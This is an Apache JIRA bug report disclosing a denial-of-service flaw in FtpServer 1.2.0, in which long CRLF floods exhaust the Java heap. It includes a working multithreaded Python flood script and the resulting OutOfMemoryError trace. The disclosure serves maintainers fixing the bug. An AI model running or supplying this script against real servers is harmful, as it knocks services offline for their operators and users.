Ardu created FTPSERVER-517:
------------------------------
Summary: The memory of FtpServer can be easily filled up, causing
Dos threaten
Key: FTPSERVER-517
URL: https://issues.apache.org/jira/browse/FTPSERVER-517
Project: FtpServer
Issue Type: Bug
Components: Core, Server
Affects Versions: 1.2.0
Environment: docker Ubuntu 20.04.3 LTS
FtpServer version 1.2.0
java version "1.8.0_341"
Java(TM) SE Runtime Environment (build 1.8.0_341-b10)
Java HotSpot(TM) 64-Bit Server VM (build 25.341-b10, mixed mode)
Reporter: Ardu
Attachments: apacheftp_atk.py
Hi, I found the memory of FtpServer can be easily filled up with a lot of
"\r\n" sequences. It shows that sending a long sequence with a lot of "\r\n" to
the server can easily make the server's java heap space out of memory and make
the server unavailable. It seems there is an issue in the memory control and
command process. This may be a threat and exploited by attackers to do the Dos
attack.
A similar threat can refer to
CVE-2017-7651[https://bugs.eclipse.org/bugs/show_bug.cgi?id=529754]
h2. Attack simulation
h3. run server
{code:java}
bin/ftpd.sh{code}
h3. run attack script
the attack script (in python) may seem like
{code:java}
import socket
import threading
import time
ip_address = "0.0.0.0"
port = 12345
payload = b"\r\n"*1000000 # work
#payload = b"aa"*1000000 # not work
def send_attack():
soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
soc.connect((ip_address,port))
soc.sendall(payload)
soc.close()
while(True):
for i in range(50):
t = threading.Thread(target=send_attack)
t.setDaemon(True)
t.start()
time.sleep(1) {code}
h2. Result
the server becomes unavailable and output information
{code:java}
Exception in thread "pool-1-thread-39" java.lang.OutOfMemoryError: Java heap
space
at java.nio.HeapByteBuffer.<init>(HeapByteBuffer.java:57)
at java.nio.ByteBuffer.allocate(ByteBuffer.java:335)
at
org.apache.mina.core.buffer.SimpleBufferAllocator.allocateNioBuffer(SimpleBufferAllocator.java:42)
at
org.apache.mina.core.buffer.SimpleBufferAllocator.allocate(SimpleBufferAllocator.java:34)
at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:235)
at org.apache.mina.core.buffer.IoBuffer.allocate(IoBuffer.java:218)
at
org.apache.mina.core.polling.AbstractPollingIoProcessor.read(AbstractPollingIoProcessor.java:508)
at
org.apache.mina.core.polling.AbstractPollingIoProcessor.access$1200(AbstractPollingIoProcessor.java:68)
at
org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1224)
at
org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.process(AbstractPollingIoProcessor.java:1213)
at
org.apache.mina.core.polling.AbstractPollingIoProcessor$Processor.run(AbstractPollingIoProcessor.java:683)
at
org.apache.mina.util.NamePreservingRunnable.run(NamePreservingRunnable.java:64)
at
java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at
java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at java.lang.Thread.run(Thread.java:750)
{code}
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
